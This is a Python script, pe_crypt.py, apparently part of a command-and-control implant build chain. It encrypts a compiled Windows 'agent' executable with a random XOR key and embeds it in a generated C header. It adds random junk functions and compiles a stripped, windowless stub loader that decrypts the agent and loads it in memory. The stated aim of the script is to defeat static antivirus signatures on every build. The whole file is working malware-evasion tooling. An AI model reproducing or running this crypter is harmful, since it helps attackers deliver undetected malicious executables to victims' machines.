#!/usr/bin/env python3
"""
pe_crypt.py — Polymorphic PE crypter.

Takes a compiled agent .exe, encrypts it with a random key, and generates
a stub loader that decrypts + reflectively loads the agent in memory.

Each invocation produces a unique binary (different key → different ciphertext
→ no static signature match).

Usage:
    python pe_crypt.py --input builds/agent_payload.exe --output builds/agent.exe

Called automatically by build_agent_c.py during the two-pass build.
"""

import argparse
import os
import random
import secrets
import shutil
import string
import struct
import subprocess
import sys
import tempfile
from pathlib import Path


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """XOR encrypt data with key (rolling)."""
    out = bytearray(len(data))
    klen = len(key)
    for i in range(len(data)):
        out[i] = data[i] ^ key[i % klen]
    return bytes(out)


def generate_stub_payload_h(encrypted: bytes, key: bytes) -> str:
    """Generate C header with encrypted payload and key as byte arrays."""

    def format_bytes(data: bytes, var_name: str, per_line: int = 16) -> str:
        lines = []
        lines.append(f"static unsigned char {var_name}[] = {{")
        for i in range(0, len(data), per_line):
            chunk = data[i:i + per_line]
            hex_vals = ", ".join(f"0x{b:02X}" for b in chunk)
            comma = "," if i + per_line < len(data) else ""
            lines.append(f"    {hex_vals}{comma}")
        lines.append("};")
        return "\n".join(lines)

    payload_arr = format_bytes(encrypted, "g_enc_payload")
    key_arr = format_bytes(key, "g_xor_key")

    return f"""/*
 * stub_payload.h — Auto-generated by pe_crypt.py.
 * Contains XOR-encrypted agent PE and decryption key.
 * DO NOT EDIT — regenerated on every build.
 */
#ifndef STUB_PAYLOAD_H
#define STUB_PAYLOAD_H

{payload_arr}

{key_arr}

#define PAYLOAD_SIZE {len(encrypted)}u
#define KEY_SIZE {len(key)}u

#endif /* STUB_PAYLOAD_H */
"""


def generate_junk_functions() -> str:
    """Generate random junk C functions to vary the stub binary."""
    rng = random.SystemRandom()
    funcs = []
    num_funcs = rng.randint(2, 5)

    for i in range(num_funcs):
        name = "".join(rng.choices(string.ascii_lowercase, k=rng.randint(6, 12)))
        ret_type = rng.choice(["int", "unsigned int", "unsigned long"])
        body_ops = []
        var = "x"
        body_ops.append(f"    {ret_type} {var} = {rng.randint(1, 0xFFFF)};")
        for _ in range(rng.randint(3, 8)):
            op = rng.choice(["+", "^", "*", "-", "<<", ">>"])
            val = rng.randint(1, 255)
            if op in ("<<", ">>"):
                val = rng.randint(1, 15)
            body_ops.append(f"    {var} = {var} {op} {val};")
        body_ops.append(f"    return {var};")

        funcs.append(
            f"static __attribute__((used)) {ret_type} {name}(void) {{\n"
            + "\n".join(body_ops)
            + "\n}\n"
        )

    return "\n".join(funcs)


def build_stub(
    stub_src: Path,
    payload_header: Path,
    output_exe: Path,
    arch: str = "x64",
    junk_code: str = "",
) -> Path:
    """Compile the stub loader with the encrypted payload."""

    cc = "x86_64-w64-mingw32-gcc" if arch == "x64" else "i686-w64-mingw32-gcc"
    strip_cmd = "x86_64-w64-mingw32-strip" if arch == "x64" else "i686-w64-mingw32-strip"

    if not shutil.which(cc):
        raise FileNotFoundError(f"{cc} not found. Install mingw-w64.")

    # Write junk code to a separate file if any
    junk_path = payload_header.parent / "stub_junk.h"
    junk_path.write_text(
        f"/* Auto-generated junk code for polymorphism */\n{junk_code}\n"
    )

    cmd = [
        cc,
        f"-I{payload_header.parent}",
        "-Wall", "-Os", "-s",
        "-fno-asynchronous-unwind-tables", "-fno-ident",
        "-fdata-sections", "-ffunction-sections",
        "-DWIN32_LEAN_AND_MEAN",
        f"-include", str(junk_path),
        "-o", str(output_exe),
        str(stub_src),
        "-lkernel32",
        "-static-libgcc",
        "-Wl,--subsystem,windows",
        "-Wl,--gc-sections",
    ]

    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(f"Stub compilation failed:\n{result.stderr}")

    # Strip symbols
    if shutil.which(strip_cmd):
        subprocess.run([strip_cmd, "--strip-all", str(output_exe)], capture_output=True)

    return output_exe


def crypt_pe(
    input_pe: Path,
    output_exe: Path,
    stub_dir: Path,
    arch: str = "x64",
    key_size: int = 32,
) -> Path:
    """
    Full crypter pipeline:
    1. Read input PE
    2. Generate random key
    3. XOR encrypt
    4. Generate stub_payload.h
    5. Compile stub → output
    """
    # Read the agent PE
    pe_bytes = input_pe.read_bytes()
    pe_size = len(pe_bytes)

    # Generate random key
    key = secrets.token_bytes(key_size)

    # Encrypt
    encrypted = xor_encrypt(pe_bytes, key)

    # Verify round-trip
    decrypted = xor_encrypt(encrypted, key)
    assert decrypted == pe_bytes, "XOR round-trip failed!"

    # Create temp build directory
    build_dir = Path(tempfile.mkdtemp(prefix="stub_build_"))

    try:
        # Generate payload header
        header_content = generate_stub_payload_h(encrypted, key)
        header_path = build_dir / "stub_payload.h"
        header_path.write_text(header_content)

        # Generate junk code for polymorphism
        junk = generate_junk_functions()

        # Copy stub source
        stub_src = stub_dir / "stub_loader.c"
        if not stub_src.exists():
            raise FileNotFoundError(f"Stub source not found: {stub_src}")

        # Compile
        build_stub(stub_src, header_path, output_exe, arch, junk)

        print(f"[+] Crypter: {pe_size} bytes payload → "
              f"{output_exe.stat().st_size} bytes stub "
              f"(key: {key[:8].hex()}...)")

        return output_exe

    finally:
        shutil.rmtree(build_dir, ignore_errors=True)


def main():
    parser = argparse.ArgumentParser(description="Polymorphic PE crypter")
    parser.add_argument("--input", type=Path, required=True,
                        help="Input PE file to encrypt")
    parser.add_argument("--output", type=Path, required=True,
                        help="Output encrypted stub exe")
    parser.add_argument("--stub-dir", type=Path, default=None,
                        help="Directory containing stub_loader.c")
    parser.add_argument("--arch", choices=["x64", "x86"], default="x64")
    parser.add_argument("--key-size", type=int, default=32,
                        help="XOR key size in bytes (default: 32)")
    args = parser.parse_args()

    if not args.input.exists():
        print(f"[!] Input file not found: {args.input}", file=sys.stderr)
        sys.exit(1)

    stub_dir = args.stub_dir
    if not stub_dir:
        # Default: look for agent_c/stub/ relative to this script
        stub_dir = Path(__file__).parent.parent / "agent_c" / "stub"

    args.output.parent.mkdir(parents=True, exist_ok=True)

    crypt_pe(args.input, args.output, stub_dir, args.arch, args.key_size)


if __name__ == "__main__":
    main()
